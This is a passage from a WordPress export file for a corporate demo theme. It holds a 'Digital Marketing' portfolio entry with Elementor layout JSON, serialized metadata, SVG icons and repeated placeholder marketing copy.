forward? Reinventing the brand growth model requires more than a reallocation of marketing budget to digital. CMOs need a reassessment of growth platforms and future brand portfolios, a new understanding of the consumer journey, a supporting strategy on data and technology. Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives\u2019 careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. <span style=\"color: #1b1d21; font-weight: 600;\">The same technology advances have dramatically <\/span>altered the competitive landscape.<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"24","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"7bb4f38","elType":"section","settings":{"layout":"full_width","gap":"extended","structure":"40"},"elements":[{"id":"ac95e95","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"2737bde","elType":"widget","settings":{"bar_style":"circle","title":"marketing analysis","percent":{"unit":"%","size":75,"sizes":[]},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"bar_color":"#55BB53"},"elements":[],"widgetType":"iprogress"}],"isInner":true},{"id":"18e44d2","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"36f53c1","elType":"widget","settings":{"bar_style":"circle","title":"business innovation","percent":{"unit":"%","size":65,"sizes":[]},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"bar_color":"#55BB53"},"elements":[],"widgetType":"iprogress"}],"isInner":true},{"id":"72e282b","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"73f0d46","elType":"widget","settings":{"bar_style":"circle","title":"finance strategy","percent":{"unit":"%","size":90,"sizes":[]},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"bar_color":"#55BB53"},"elements":[],"widgetType":"iprogress"}],"isInner":true},{"id":"3445706","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"832a738","elType":"widget","settings":{"bar_style":"circle","title":"corporate management","percent":{"unit":"%","size":45,"sizes":[]},"bar_color":"#55BB53"},"elements":[],"widgetType":"iprogress"}],"isInner":true}],"isInner":true},{"id":"1209994","elType":"widget","settings":{"text":"Divider","color":"#0000001A","gap":{"unit":"px","size":35,"sizes":[]}},"elements":[],"widgetType":"divider"},{"id":"4820b1b","elType":"widget","settings":{"title":"<span style=\"color:#55bb53\">03.<\/span> Results","header_size":"h5","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"1b49fe8","elType":"section","settings":{"gap":"no","structure":"20","padding":{"unit":"px","top":"0","right":"0","bottom":"60","left":"0","isLinked":false},"layout":"full_width","reverse_order_tablet":"reverse-tablet","reverse_order_mobile":"reverse-mobile"},"elements":[{"id":"e2d8116","elType":"column","settings":{"_column_size":50,"_inline_size":null,"_inline_size_tablet":100},"elements":[{"id":"127919d","elType":"widget","settings":{"editor":"<p>A utility company was steadily losing customers as consumers gained the right to select their energy supplier. To boost loyalty, we helped the company transform its culture to be intensely customer-focused.<\/p><p>We helped a global technology company that specializes in software to reduce the complexity and mystery <span style=\"color: #55bb53;\">around their pricing strategy.<\/span> The work helped generate millions more in income each year. We helped a multibillion dollar global technology giant simplify structures, save millions in costs, and create better-prepared sellers with more time for customers. We helped a multibillion dollar global technology giant simplify organizational structures, save millions in costs.<\/p>","_padding":{"unit":"px","top":"0","right":"42","bottom":"0","left":"0","isLinked":false},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"}],"isInner":true},{"id":"9ccbd6d","elType":"column","settings":{"_column_size":50,"_inline_size":null,"_inline_size_tablet":100},"elements":[{"id":"8af2820","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/chart-project-home-4.png","id":2064},"image_size":"full","_margin":{"unit":"px","top":"0","right":"0","bottom":"0","left":"-15","isLinked":false},"_margin_mobile":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[],"widgetType":"image"}],"isInner":true}],"isInner":true},{"id":"298a987","elType":"widget","settings":{"social_icon_list":[{"social_icon":{"value":"fab fa-twitter","library":"fa-brands"},"_id":"049712d","item_icon_color":"custom","item_icon_primary_color":"#51AFF7","item_icon_secondary_color":"#FFFFFF"},{"social_icon":{"value":"fab fa-facebook-f","library":"fa-brands"},"_id":"030f11b","item_icon_color":"custom","item_icon_primary_color":"#284BAF","item_icon_secondary_color":"#FFFFFF"},{"social_icon":{"value":"fab fa-google-plus-g","library":"fa-brands"},"_id":"9c6b4b3","item_icon_color":"custom","item_icon_primary_color":"#E03609","item_icon_secondary_color":"#FFFFFF"},{"social_icon":{"value":"fab fa-pinterest-p","library":"fa-brands"},"_id":"b977f7f","item_icon_color":"custom","item_icon_primary_color":"#E40000","item_icon_secondary_color":"#FFFFFF"}],"icon_color":"custom","icon_primary_color":"rgba(26, 26, 26, 0)","icon_secondary_color":"#1A1A1A","icon_size":{"unit":"px","size":14,"sizes":[]},"icon_spacing":{"unit":"px","size":15,"sizes":[]},"image_border_border":"solid","image_border_width":{"unit":"px","top":"1","right":"1","bottom":"1","left":"1","isLinked":true},"image_border_color":"rgba(255, 255, 255, 0)","border_radius":{"unit":"px","top":"50","right":"50","bottom":"50","left":"50","isLinked":true},"hover_border_color":"rgba(255, 255, 255, 0)","columns":"4","align":"right","_padding":{"unit":"px","top":"0","right":"0","bottom":"50","left":"0","isLinked":false}},"elements":[],"widgetType":"social-icons"}],"isInner":false}],"isInner":false}]]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_controls_usage]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:9:{s:11:"text-editor";a:3:{s:5:"count";i:8;s:15:"control_percent";i:1;s:8:"controls";a:2:{s:7:"content";a:1:{s:14:"section_editor";a:2:{s:6:"editor";i:8;s:8:"drop_cap";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:3:{s:15:"_padding_mobile";i:3;s:15:"_padding_tablet";i:1;s:8:"_padding";i:5;}}}}s:6:"column";a:3:{s:5:"count";i:12;s:15:"control_percent";i:0;s:8:"controls";a:1:{s:6:"layout";a:1:{s:6:"layout";a:3:{s:12:"_inline_size";i:12;s:19:"_inline_size_tablet";i:8;s:19:"_inline_size_mobile";i:6;}}}}s:7:"heading";a:3:{s:5:"count";i:7;s:15:"control_percent";i:1;s:8:"controls";a:3:{s:7:"content";a:1:{s:13:"section_title";a:2:{s:5:"title";i:7;s:11:"header_size";i:7;}}s:5:"style";a:1:{s:19:"section_title_style";a:5:{s:11:"title_color";i:4;s:21:"typography_typography";i:4;s:22:"typography_font_family";i:4;s:20:"typography_font_size";i:4;s:22:"typography_font_weight";i:4;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:7;}}}}s:7:"section";a:3:{s:5:"count";i:6;s:15:"control_percent";i:0;s:8:"controls";a:3:{s:6:"layout";a:2:{s:14:"section_layout";a:3:{s:3:"gap";i:4;s:16:"content_position";i:1;s:6:"layout";i:2;}s:17:"section_structure";a:1:{s:9:"structure";i:4;}}s:5:"style";a:2:{s:18:"section_background";a:2:{s:21:"background_background";i:1;s:16:"background_color";i:1;}s:14:"section_border";a:1:{s:13:"border_radius";i:1;}}s:8:"advanced";a:2:{s:16:"section_advanced";a:2:{s:7:"padding";i:4;s:14:"padding_mobile";i:1;}s:19:"_section_responsive";a:2:{s:20:"reverse_order_tablet";i:1;s:20:"reverse_order_mobile";i:1;}}}}s:5:"image";a:3:{s:5:"count";i:2;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:7:"content";a:1:{s:13:"section_image";a:2:{s:5:"image";i:2;s:10:"image_size";i:2;}}s:5:"style";a:1:{s:19:"section_style_image";a:1:{s:19:"image_border_radius";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:3:{s:7:"_margin";i:1;s:14:"_margin_mobile";i:1;s:15:"_padding_tablet";i:1;}}}}s:9:"icon-list";a:3:{s:5:"count";i:1;s:15:"control_percent";i:3;s:8:"controls";a:3:{s:7:"content";a:1:{s:12:"section_icon";a:1:{s:9:"icon_list";i:1;}}s:5:"style";a:3:{s:17:"section_icon_list";a:1:{s:13:"space_between";i:1;}s:18:"section_icon_style";a:2:{s:10:"icon_color";i:1;s:9:"icon_size";i:1;}s:18:"section_text_style";a:1:{s:11:"text_indent";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:1;}}}}s:7:"divider";a:3:{s:5:"count";i:2;s:15:"control_percent";i:1;s:8:"controls";a:1:{s:5:"style";a:1:{s:21:"section_divider_style";a:3:{s:5:"color";i:2;s:3:"gap";i:2;s:10:"gap_mobile";i:1;}}}}s:9:"iprogress";a:3:{s:5:"count";i:4;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:7:"content";a:1:{s:15:"content_section";a:3:{s:9:"bar_style";i:4;s:5:"title";i:4;s:7:"percent";i:4;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:15:"_padding_tablet";i:2;s:15:"_padding_mobile";i:1;}}s:5:"style";a:1:{s:17:"bar_style_section";a:1:{s:9:"bar_color";i:4;}}}}s:12:"social-icons";a:3:{s:5:"count";i:1;s:15:"control_percent";i:6;s:8:"controls";a:3:{s:7:"content";a:1:{s:19:"section_social_icon";a:3:{s:16:"social_icon_list";i:1;s:7:"columns";i:1;s:5:"align";i:1;}}s:5:"style";a:2:{s:20:"section_social_style";a:9:{s:10:"icon_color";i:1;s:18:"icon_primary_color";i:1;s:20:"icon_secondary_color";i:1;s:9:"icon_size";i:1;s:12:"icon_spacing";i:1;s:19:"image_border_border";i:1;s:18:"image_border_width";i:1;s:18:"image_border_color";i:1;s:13:"border_radius";i:1;}s:20:"section_social_hover";a:1:{s:18:"hover_border_color";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:1;}}}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Digital Marketing</title>
		<link>http://wpdemo.archiwp.com/maxbizz-corporate/portfolio/digital-marketing/</link>
		<pubDate>Fri, 11 Sep 2020 07:16:27 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?post_type=ot_portfolio&#038;p=837</guid>
		<description></description>
		<content:encoded><![CDATA[<p>Not so long ago, marketing consumer products felt like a genteel game of lawn tennis: Established competitors invested in creative with long lead times, using proven models of TV and big-box retail, alongside trusted agency partners. Today, it’s more like a sprawling contest of mixed martial arts, with new competitors playing by different rules; an unprecedented complexity of channels, content and partners; and a step change in speed and ways of working that has punches flying at incumbent consumer products companies. Within the span of most executives’ careers, advances in technology have reshaped how consumers engage with brands.</p>		
			<h6>Client:</h6>		
		<p>OceanThemes</p>		
			<h6>Website:</h6>		
		<p>oceanthemes.net</p>		
			<h6>Date:</h6>		
		<p>August 14, 2020</p>		
			<h6>Category:</h6>		
		<p>Marketing/Finance</p>		
										<img width="1174" height="620" src="https://maxbizz.s3.amazonaws.com/images/project-details.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/project-details.jpg 1174w, https://maxbizz.s3.amazonaws.com/images/project-details-1-300x158.jpg 300w, https://maxbizz.s3.amazonaws.com/images/project-details-1-1024x541.jpg 1024w, https://maxbizz.s3.amazonaws.com/images/project-details-1-768x406.jpg 768w" sizes="(max-width: 1174px) 100vw, 1174px" />											
			<h5>01. Сhallenge</h5>		
		<p>Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives’ careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. The same technology advances have dramatically altered the competitive landscape.</p>		
					<ul>
							<li>
							<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve">
<g>
	<g id="c147_full_moon">
		<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
	</g>
	<g id="Capa_1_14_">
	</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
</svg>						
										the organization is just beginning to operate in the market, implementing some projects. Our team of global experts help you achieve sustainable, organic growth by focusing on three critical building blocks.
									</li>
								<li>
							<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve">
<g>
	<g id="c147_full_moon">
		<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
	</g>
	<g id="Capa_1_14_">
	</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
</svg>						
										there are projects that require temporary expansion of the marketing department. Customer-focused businesses build a virtuous cycle we call the "customer wheel." We help you at every stage of growth, developing custom solutions and collaborating with all levels of your organization.
									</li>
						</ul>
			<h5>02. Solutions</h5>		
		<p>What’s the right path forward? Reinventing the brand growth model requires more than a reallocation of marketing budget to digital. CMOs need a reassessment of growth platforms and future brand portfolios, a new understanding of the consumer journey, a supporting strategy on data and technology. Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives’ careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. The same technology advances have dramatically altered the competitive landscape.</p>		
					75				
			<h6>marketing analysis</h6>		
					65				
			<h6>business innovation</h6>		
					90				
			<h6>finance strategy</h6>		
					45				
			<h6>corporate management</h6>		
			<h5>03. Results</h5>		
		<p>A utility company was steadily losing customers as consumers gained the right to select their energy supplier. To boost loyalty, we helped the company transform its culture to be intensely customer-focused.</p><p>We helped a global technology company that specializes in software to reduce the complexity and mystery around their pricing strategy. The work helped generate millions more in income each year. We helped a multibillion dollar global technology giant simplify structures, save millions in costs, and create better-prepared sellers with more time for customers. We helped a multibillion dollar global technology giant simplify organizational structures, save millions in costs.</p>		
										<img width="606" height="342" src="https://maxbizz.s3.amazonaws.com/images/chart-project-home-4.png" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/chart-project-home-4.png 606w, https://maxbizz.s3.amazonaws.com/images/chart-project-home-4-300x169.png 300w" sizes="(max-width: 606px) 100vw, 606px" />											
					<a target="_blank" rel="noopener noreferrer">
						Twitter
											</a>
					<a target="_blank" rel="noopener noreferrer">
						Facebook-f
											</a>
					<a target="_blank" rel="noopener noreferrer">
						Google-plus-g
											</a>
					<a target="_blank" rel="noopener noreferrer">
						Pinterest-p
											</a>]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>837</wp:post_id>
		<wp:post_date><![CDATA[2020-09-11 07:16:27]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-11 07:16:27]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[digital-marketing]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[ot_portfolio]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
										<category domain="portfolio_cat" nicename="finance"><![CDATA[finance]]></category>
		<category domain="portfolio_cat" nicename="marketing"><![CDATA[marketing]]></category>
						<wp:postmeta>
		<wp:meta_key><![CDATA[_edit_last]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_thumbnail_id]]></wp:meta_key>
		<wp:meta_value><![CDATA[838]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_page_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[slide_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[rs_page_bg_color]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_switch]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_bg_image]]></wp:meta_key>
		<wp:meta_value><![CDATA[774]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[slide_img]]></wp:meta_key>
		<wp:meta_value><![CDATA[839]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_edit_mode]]></wp:meta_key>
		<wp:meta_value><![CDATA[builder]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_template_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[wp-post]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_version]]></wp:meta_key>
		<wp:meta_value><![CDATA[3.0.13]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_data]]></wp:meta_key>
		<wp:meta_value><![CDATA[[{"id":"3be3337c","elType":"section","settings":{"gap":"extended","content_position":"bottom","structure":"20","padding":{"unit":"px","top":"80","right":"0","bottom":"50","left":"0","isLinked":false}},"elements":[{"id":"5befbf60","elType":"column","settings":{"_column_size":50,"_inline_size":65,"_inline_size_tablet":100},"elements":[{"id":"1ce70032","elType":"widget","settings":{"editor":"<p>Not so long ago, marketing consumer products felt like a genteel game of lawn tennis: Established competitors invested in creative with long lead times, using proven models of TV and big-box retail, alongside trusted agency partners. Today, it\u2019s more like a sprawling contest of mixed martial arts, with new competitors playing by different rules; an unprecedented complexity of channels, content and partners; and a step change in speed and ways of working that has punches flying at incumbent consumer products companies. Within the span of most executives\u2019 careers, advances in technology have reshaped how consumers engage with brands.<\/p>","drop_cap":"yes","_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"}],"isInner":false},{"id":"3f822f27","elType":"column","settings":{"_column_size":50,"_inline_size":35,"_inline_size_tablet":100},"elements":[{"id":"68851ebc","elType":"section","settings":{"gap":"extended","structure":"20","background_background":"classic","background_color":"#F5F5F5","border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true},"padding":{"unit":"px","top":"35","right":"20","bottom":"35","left":"20","isLinked":false},"padding_mobile":{"unit":"px","top":"15","right":"15","bottom":"15","left":"15","isLinked":true}},"elements":[{"id":"250ea23d","elType":"column","settings":{"_column_size":50,"_inline_size":47.8130000000000023874235921539366245269775390625,"_inline_size_mobile":100},"elements":[{"id":"71c341e4","elType":"widget","settings":{"title":"Client:","header_size":"h6","title_color":"#1B1D21","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":16,"sizes":[]},"typography_font_weight":"bold","_padding":{"unit":"px","top":"0","right":"0","bottom":"3","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"6542827e","elType":"widget","settings":{"editor":"<p>OceanThemes<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"28","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"371f6bc3","elType":"widget","settings":{"title":"Website:","header_size":"h6","title_color":"#1B1D21","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":16,"sizes":[]},"typography_font_weight":"bold","_padding":{"unit":"px","top":"0","right":"0","bottom":"3","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"1eb0ca9d","elType":"widget","settings":{"editor":"<p>oceanthemes.net<\/p>","_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"}],"isInner":true},{"id":"71f04c6a","elType":"column","settings":{"_column_size":50,"_inline_size":52.1820000000000021600499167107045650482177734375,"_inline_size_mobile":100},"elements":[{"id":"3d3344ee","elType":"widget","settings":{"title":"Date:","header_size":"h6","title_color":"#1B1D21","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":16,"sizes":[]},"typography_font_weight":"bold","_padding":{"unit":"px","top":"0","right":"0","bottom":"3","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"832149d","elType":"widget","settings":{"editor":"<p>August 14, 2020<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"28","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"5342643c","elType":"widget","settings":{"title":"Category:","header_size":"h6","title_color":"#1B1D21","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":16,"sizes":[]},"typography_font_weight":"bold","_padding":{"unit":"px","top":"0","right":"0","bottom":"3","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"6f721437","elType":"widget","settings":{"editor":"<p>Marketing\/Finance<\/p>"},"elements":[],"widgetType":"text-editor"}],"isInner":true}],"isInner":true}],"isInner":false}],"isInner":false},{"id":"2f3d08dd","elType":"section","settings":{"padding":{"unit":"px","top":"0","right":"0","bottom":"45","left":"0","isLinked":false}},"elements":[{"id":"6b706da","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"63060966","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/project-details.jpg","id":780},"image_size":"full","image_border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true}},"elements":[],"widgetType":"image"}],"isInner":false}],"isInner":false},{"id":"75e4e9b8","elType":"section","settings":[],"elements":[{"id":"6bda05f8","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"52f0b92f","elType":"widget","settings":{"title":"<span style=\"color:#55bb53\">01.<\/span> \u0421hallenge","header_size":"h5","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"54d9052f","elType":"widget","settings":{"editor":"<p>Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives\u2019 careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. <span style=\"color: #1b1d21; font-weight: 600;\">The same technology advances have dramatically <\/span>altered the competitive landscape.<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"24","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"3b65fe94","elType":"widget","settings":{"icon_list":[{"text":"<span style=\"color:#262832; font-weight:600;\">the organization is just beginning to operate<\/span> in the market, implementing some projects. Our team of global experts help you achieve sustainable, organic growth by focusing on three critical building blocks.","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"b098382"},{"text":"<span style=\"color:#262832; font-weight:600;\">there are projects that require temporary expansion<\/span> of the marketing department. Customer-focused businesses build a virtuous cycle we call the \"customer wheel.\" We help you at every stage of growth, developing custom solutions and collaborating with all levels of your organization.","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"7ebdebe"}],"space_between":{"unit":"px","size":17,"sizes":[]},"icon_color":"#55BB53","icon_size":{"unit":"px","size":6,"sizes":[]},"text_indent":{"unit":"px","size":14,"sizes":[]},"_padding":{"unit":"px","top":"0","right":"0","bottom":"0","left":"19","isLinked":false}},"elements":[],"widgetType":"icon-list"},{"id":"7545e3c5","elType":"widget","settings":{"text":"Divider","color":"#0000001A","gap":{"unit":"px","size":45,"sizes":[]},"gap_mobile":{"unit":"px","size":30,"sizes":[]}},"elements":[],"widgetType":"divider"},{"id":"605dfd7a","elType":"widget","settings":{"title":"<span style=\"color:#55bb53\">02.<\/span> Solutions","header_size":"h5","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"2518391b","elType":"widget","settings":{"editor":"<p>What\u2019s the right path forward? Reinventing the brand growth model requires more than a reallocation of marketing budget to digital. CMOs need a reassessment of growth platforms and future brand portfolios, a new understanding of the consumer journey, a supporting strategy on data and technology. Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives\u2019 careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. <span style=\"color: #1b1d21; font-weight: 600;\">The same technology advances have dramatically <\/span>altered the competitive landscape.<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"24","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"633f728b","elType":"section","settings":{"layout":"full_width","gap":"extended","structure":"40"},"elements":[{"id":"4070ca87","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"f1792de","elType":"widget","settings":{"bar_style":"circle","title":"marketing analysis","percent":{"unit":"%","size":75,"sizes":[]},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"bar_color":"#55BB53"},"elements":[],"widgetType":"iprogress"}],"isInner":true},{"id":"7cf09702","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"27507c6a","elType":"widget","settings":{"bar_style":"circle","title":"business innovation","percent":{"unit":"%","size":65,"sizes":[]},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"bar_color":"#55BB53"},"elements":[],"widgetType":"iprogress"}],"isInner":true},{"id":"6c19f0d0","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"4db11d58","elType":"widget","settings":{"bar_style":"circle","title":"finance strategy","percent":{"unit":"%","size":90,"sizes":[]},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"bar_color":"#55BB53"},"elements":[],"widgetType":"iprogress"}],"isInner":true},{"id":"4723e5a","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"7844df75","elType":"widget","settings":{"bar_style":"circle","title":"corporate management","percent":{"unit":"%","size":45,"sizes":[]},"bar_color":"#55BB53"},"elements":[],"widgetType":"iprogress"}],"isInner":true}],"isInner":true},{"id":"5d819e34","elType":"widget","settings":{"text":"Divider","color":"#0000001A","gap":{"unit":"px","size":35,"sizes":[]}},"elements":[],"widgetType":"divider"},{"id":"414945e5","elType":"widget","settings":{"title":"<span style=\"color:#55bb53\">03.<\/span> Results","header_size":"h5","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"58ded439","elType":"section","settings":{"gap":"no","structure":"20","padding":{"unit":"px","top":"0","right":"0","bottom":"60","left":"0","isLinked":false},"layout":"full_width","reverse_order_tablet":"reverse-tablet","reverse_order_mobile":"reverse-mobile"},"elements":[{"id":"3c1686f7","elType":"column","settings":{"_column_size":50,"_inline_size":null,"_inline_size_tablet":100},"elements":[{"id":"77c59310","elType":"widget","settings":{"editor":"<p>A utility company was steadily losing customers as consumers gained the right to select their energy supplier. To boost loyalty, we helped the company transform its culture to be intensely customer-focused.<\/p><p>We helped a global technology company that specializes in software to reduce the complexity and mystery <span style=\"color: #55bb53;\">around their pricing strategy.<\/span> The work helped generate millions more in income each year. We helped a multibillion dollar global technology giant simplify structures, save millions in costs, and create better-prepared sellers with more time for customers. We helped a multibillion dollar global technology giant simplify organizational structures, save millions in 